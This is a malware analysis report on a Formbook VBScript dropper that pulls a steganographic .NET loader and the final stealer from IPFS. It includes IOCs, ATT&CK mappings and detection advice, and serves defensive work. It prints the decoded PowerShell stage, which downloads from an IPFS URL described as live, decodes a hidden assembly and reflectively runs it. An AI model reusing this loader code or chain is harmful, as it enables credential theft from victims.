highPhishing

Formbook - VBScript Dropper with IPFS-Hosted Steganographic Loader

PublishedMarch 12, 2026

phishingcredential-theftc2apt

Executive Summary

This sample is a heavily obfuscated VBScript (VBS) dropper that initiates a multi-stage infection chain culminating in the deployment of the Formbook information stealer. The script employs dual-layer obfuscation using "chevice" and "caram" token substitution across 38,877 lines—the first ~19,400 of which are pure junk code designed to bloat the file and exhaust analysis tools. The functional payload occupies the final ~40 lines. Upon execution, the dropper decodes a hex-encoded PowerShell command, then launches it silently via Windows Management Instrumentation (WMI) to evade detection. The PowerShell stage downloads a fake JPEG file from the InterPlanetary File System (IPFS) pinning service gateway.lighthouse.storage, extracts a Base64-reversed .NET assembly hidden between steganographic markers, and executes the Fiber.Program.Main method. This loader then downloads and process-injects the final Formbook payload (also hosted on IPFS). Use of IPFS for payload hosting is a deliberate evasion technique: content is immutable, decentralised, and difficult to take down. Known lure filenames include KIZAD_WSP-2025-PRO.vbs, suggesting potential targeting of logistics or commercial entities in the UAE/Gulf region.

Sample Metadata

Field	Value
SHA256	`95f69328694f351bb21526bc7970646af26380f2be3a1008ce58311c12d11f54`
MD5	`d107b3bf4609b4c1bc3ecc06d518d2df`
SHA1	`67b8d5dea53db8c174c1c17c7b06da59770e179e`
File Type	ASCII text / VBScript (CRLF line terminators)
File Size	1,613,520 bytes (1.54 MB)
Line Count	38,877 lines
VT Detections	17 / 76 (as of 2026-03-12)
First Seen	2026-03-11 08:14:06 UTC
Last Seen	2026-03-12 16:21:34 UTC
Threat Label	`trojan.gqyk/sagent` (VirusTotal consensus)
Reported By	abuse.ch
Known Filenames	`KIZAD_WSP-2025-PRO.vbs`, `ahppysnewfud.vbs`, `Name_File.vbs`

Stage 2 – .NET Loader (extracted from IPFS JPEG)

Field	Value
SHA256	`9fe957e5be9729b4fe64906b95a6ff2931d42ff2805ad12069b99e3fdc8b6ae3`
MD5	`b8d6dd51523250152b0dbab27e53fcc8`
File Type	PE32 DLL – Mono/.NET assembly
File Size	1,323,520 bytes
VT Detections	44 / 76
AV Name	`Gen:Variant.Cerbu.270977` / `MSIL/Kryptik.APCM` / `Trojan.InjectNET.14`

Static Analysis Findings

VBScript Obfuscation (Stage 1)

The VBS file uses two layers of token-based string obfuscation:

Junk inflation: Lines 1–19,418 consist entirely of the statement nonrewarding = nonrewarding & "chevice", building a never-used string. This pads the file to ~1.5 MB to slow or crash AV scanners and analysts.
Dual-token hex encoding: The hex-encoded PowerShell payload is stored in variable echoey. Each hex character is separated by the token caram, and additional chevice tokens are sprinkled throughout. Decoding is:
```
subcookie = Replace(Replace(CStr(echoey), "chevice", ""), "caram", "")
```
After removing both tokens, a raw hexadecimal string remains.
String fragmentation: API names are further obfuscated by splitting across concatenated chevice-containing substrings:
- winmgmts:root\cimv2 → wcheviceichevicenchevicemcheviceg...
- Win32_ProcessStartup, Win32_Process

PowerShell Payload (decoded from hex)

$mazamorra = 'https://gateway.lighthouse.storage/ipfs/bafybeienmgwcoj64jx2t5nmlik2wba3xsil6bmjzqkszqpwyadgvl64mxe'
$preopinion = New-Object ("Net.Web"+"Client")
$yarmulkes = $preopinion.("Download"+"Data").Invoke($mazamorra)
$glossed = [Text.Encoding]::UTF8.GetString($yarmulkes)
$spiromonas = 'IN-'
$wholth = '-in1'
$winkie = $glossed.IndexOf($spiromonas)
$magistracy = $glossed.LastIndexOf($wholth)
# ... extract between IN- and -in1 markers, reverse, replace # with A, Base64 decode
$archespore = [Convert]::("FromBase6"+"4String").Invoke($nolpe)  # .NET assembly bytes
$proplyd = [AppDomain]::CurrentDomain.("Lo"+"ad").Invoke($archespore)
$conessi = @(
  'https://gateway.lighthouse.storage/ipfs/bafybeigl7leimjh6izjxqapmyjzuobigsz6l7y2lvfcyrnyw5nl254m6aq',
  '0','C:\Users\Public\Downloads\','Name_File','wscript','1','wscript','0',
  'URL','C:\Users\Public\Downloads\','Name_File','vbs','1','1','Task_Name','0','','',''
)
$floodlighting = $proplyd.GetType('Fiber.Pro'+'gram')
$dangerfully = $floodlighting.GetMethod('Ma'+'in')
$dangerfully.Invoke($null, [object[]]$conessi)

Key observations:

The URL string is built with character concatenation to evade static string matching.
.NET reflection API calls (GetType, GetMethod, Invoke) are split with string concatenation.
The Fiber.Program.Main method receives a configuration array including the C2 IPFS URL, drop paths, host process name (wscript), task name (Task_Name), and persistence flags.

Stage 2 JPEG Steganography

The IPFS JPEG (bafybeienmgwcoj64jx2t5nmlik2wba3xsil6bmjzqkszqpwyadgvl64mxe) is a valid 3,155,453-byte JPEG with an HP ICC colour profile. The .NET assembly is hidden within the JPEG data stream:

Start marker: IN- at byte offset 1,390,750
End marker: -in1 at byte offset 3,155,449
Encoding: Base64, reversed, with # replacing A characters
Extracted assembly: 1,323,520 bytes, PE32 DLL (Mono/.NET)

Stage 2 .NET Loader (Fiber.Program)

The Fiber.Program .NET assembly (detected as Gen:Variant.Cerbu.270977) performs:

Process injection: imports VirtualAllocEx, WriteProcessMemory, CreateProcess from kernel32.dll
Task Scheduler persistence: embeds Microsoft.Win32.TaskScheduler.dll (legitimate library from github.com/dahall/taskscheduler) to create a scheduled task named Task_Name
AES encryption: references AesCryptoServiceProvider (likely for C2 traffic or payload decryption)
Target process: injects into wscript.exe
Final payload: downloads from second IPFS URL (bafybeigl7leimjh6izjxqapmyjzuobigsz6l7y2lvfcyrnyw5nl254m6aq, 2.5MB JPEG)

Entropy and Sections

VBS source: low entropy (~3.5 bits/byte) due to repetitive junk text
Stage 2 .NET DLL: PE32, 3 sections, moderate entropy indicating packed/encrypted embedded resources

Behavioral Analysis (Static Inference)

Based on static analysis and known Formbook TTP patterns, the expected runtime behaviour is:

Execution: User double-clicks .vbs file; wscript.exe executes the dropper.
Self-copy: Script copies itself to C:\Users\Public\Downloads\Name_File.vbs.
WMI launch: Uses winmgmts:root\cimv2 Win32_Process.Create to spawn powershell.exe with -NoProfile -WindowStyle Hidden flags.
IPFS download: PowerShell downloads 3.1MB JPEG from Lighthouse IPFS gateway.
Assembly loading: Extracts, decodes, reverses, and reflectively loads the .NET assembly into the current PowerShell process.
Task persistence: Fiber.Program creates a Windows Scheduled Task (Task_Name) pointing to C:\Users\Public\Downloads\Name_File.vbs or the wscript launcher.
Process injection: Spawns wscript.exe as a host process, allocates memory, and writes the Formbook payload.
Formbook execution: Formbook activates its form-grabbing, keylogging, screenshot, credential theft, and browser cookie-stealing modules.

Network Indicators

Indicator	Type	Role
`gateway.lighthouse.storage`	Domain	IPFS gateway used for all payload hosting
`https://gateway.lighthouse.storage/ipfs/bafybeienmgwcoj64jx2t5nmlik2wba3xsil6bmjzqkszqpwyadgvl64mxe`	URL	Stage 2: .NET loader disguised as JPEG (3.1MB)
`https://gateway.lighthouse.storage/ipfs/bafybeigl7leimjh6izjxqapmyjzuobigsz6l7y2lvfcyrnyw5nl254m6aq`	URL	Stage 3: Formbook payload disguised as JPEG (2.5MB)
`bafybeienmgwcoj64jx2t5nmlik2wba3xsil6bmjzqkszqpwyadgvl64mxe`	IPFS CID	Stage 2 loader CID
`bafybeigl7leimjh6izjxqapmyjzuobigsz6l7y2lvfcyrnyw5nl254m6aq`	IPFS CID	Formbook payload CID

Both IPFS resources were confirmed live as of 2026-03-12, hosted on Lighthouse.storage's Cloudfront-backed IPFS gateway. IPFS content-addressing ensures payloads cannot be removed by domain takedown.

MITRE ATT&CK TTPs

Technique ID	Name	Notes
T1059.005	Command and Scripting Interpreter: VBScript	Initial dropper execution
T1059.001	Command and Scripting Interpreter: PowerShell	Stage 2 execution via WMI
T1047	Windows Management Instrumentation	WMI used to spawn PowerShell hidden
T1027	Obfuscated Files or Information	Dual-token hex obfuscation + file inflation
T1027.002	Software Packing	Stage 2 assembly embedded in JPEG
T1027.010	Command Obfuscation	String concatenation to evade string detection
T1564.001	Hide Artifacts: Hidden Window	`powershell.exe -WindowStyle Hidden`
T1105	Ingress Tool Transfer	Payload fetched from IPFS at runtime
T1583.006	Acquire Infrastructure: Web Services	IPFS used for resilient payload hosting
T1036.005	Masquerading: Match Legitimate Name or Location	.NET DLL named `Microsoft.Win32.TaskScheduler.dll`
T1055	Process Injection	VirtualAllocEx + WriteProcessMemory into wscript.exe
T1055.002	Portable Executable Injection	PE injected into host process
T1053.005	Scheduled Task/Job: Scheduled Task	Task named `Task_Name` for persistence
T1547.001	Boot or Logon Autostart Execution	Scheduled task triggers on logon
T1074.001	Data Staged: Local Data Staging	Drops copy to `C:\Users\Public\Downloads\`
T1113	Screen Capture	Formbook capability
T1056.001	Input Capture: Keylogging	Formbook capability
T1539	Steal Web Session Cookie	Formbook browser cookie theft
T1555.003	Credentials from Password Stores: Credentials from Web Browsers	Formbook browser credential theft
T1041	Exfiltration Over C2 Channel	Formbook C2 exfiltration

IOCs

File Indicators

Type	Value	Description
SHA256	`95f69328694f351bb21526bc7970646af26380f2be3a1008ce58311c12d11f54`	VBS dropper
MD5	`d107b3bf4609b4c1bc3ecc06d518d2df`	VBS dropper
SHA1	`67b8d5dea53db8c174c1c17c7b06da59770e179e`	VBS dropper
SHA256	`9fe957e5be9729b4fe64906b95a6ff2931d42ff2805ad12069b99e3fdc8b6ae3`	Stage 2 .NET loader
MD5	`b8d6dd51523250152b0dbab27e53fcc8`	Stage 2 .NET loader
Filename	`KIZAD_WSP-2025-PRO.vbs`	Lure filename
Filename	`ahppysnewfud.vbs`	Alternate dropper name
Filename	`Name_File.vbs`	Dropped copy path
Path	`C:\Users\Public\Downloads\Name_File.vbs`	Persistence file drop

Network Indicators

Type	Value	Description
Domain	`gateway.lighthouse.storage`	IPFS gateway for all payloads
URL	`https://gateway.lighthouse.storage/ipfs/bafybeienmgwcoj64jx2t5nmlik2wba3xsil6bmjzqkszqpwyadgvl64mxe`	Stage 2 loader URL
URL	`https://gateway.lighthouse.storage/ipfs/bafybeigl7leimjh6izjxqapmyjzuobigsz6l7y2lvfcyrnyw5nl254m6aq`	Formbook payload URL
IPFS CID	`bafybeienmgwcoj64jx2t5nmlik2wba3xsil6bmjzqkszqpwyadgvl64mxe`	Stage 2 loader CID
IPFS CID	`bafybeigl7leimjh6izjxqapmyjzuobigsz6l7y2lvfcyrnyw5nl254m6aq`	Formbook payload CID

Artifact/Behavioral Indicators

Type	Value	Description
Scheduled Task	`Task_Name`	Persistence task created by loader
Process	`wscript.exe`	Host process for Formbook injection
WMI Query	`winmgmts:root\cimv2` → `Win32_Process.Create`	Execution via WMI
Registry Key	(standard Formbook HKCU run key pattern)	Possible secondary persistence
.NET Class	`Fiber.Program`	Loader class name
.NET Method	`Fiber.Program.Main`	Loader entry point
Steganography	Markers `IN-` / `-in1` in JPEG	Hidden payload markers

Campaign Context and Attribution

Malware family: Formbook (also known as FormBook, XLoader on macOS). A commodity information stealer-as-a-service (MaaS) sold on underground forums since ~2016 and its XLoader successor.
Lure: The filename KIZAD_WSP-2025-PRO.vbs references "KIZAD" (Khalifa Industrial Zone Abu Dhabi) and "WSP" (possibly a construction/engineering firm), suggesting targeting of logistics, manufacturing, or construction sector targets in the UAE/Middle East.
Distribution: Likely delivered via email phishing. The VBS dropper pattern (self-copying + WMI execution) is consistent with known Formbook MaaS distribution kits observed in 2025-2026.
IPFS Abuse: The use of gateway.lighthouse.storage as a payload delivery mechanism is a growing trend among commodity malware actors seeking censorship-resistant hosting. Multiple Formbook campaigns have adopted IPFS gateways since mid-2024.
Attribution: Formbook is sold as a crimeware kit; attribution to a specific threat actor requires additional campaign correlation. The KIZAD lure may indicate a Middle East-focused operator.

Detection Recommendations

Endpoint

Block execution of .vbs files from email clients and Downloads folders via AppLocker/WDAC.
Detect PowerShell processes spawned by wscript.exe with -WindowStyle Hidden and -NoProfile arguments.
Alert on Win32_Process.Create WMI events spawning powershell.exe.
Monitor for creation of scheduled tasks with generic names (e.g., Task_Name) or tasks pointing to C:\Users\Public\.
Detect reflective .NET assembly loading from memory (ETW .NET process events).
Flag any process injecting into wscript.exe using VirtualAllocEx/WriteProcessMemory.

Network

Block outbound HTTP/HTTPS requests to gateway.lighthouse.storage (and other public IPFS gateways: ipfs.io, cloudflare-ipfs.com, dweb.link).
Alert on DNS queries resolving to Lighthouse Storage / IPFS gateway infrastructure.
Inspect large JPEG downloads (Content-Type: image/jpeg) from non-CDN cloud storage for anomalous content (e.g., ASCII text at high byte offsets).

Threat Hunting

Search for IN- and -in1 byte patterns in downloaded files (JPEG steganography markers).
Hunt for .vbs files in C:\Users\Public\ directories.
Correlate powershell.exe processes with parent wscript.exe + WMI activity.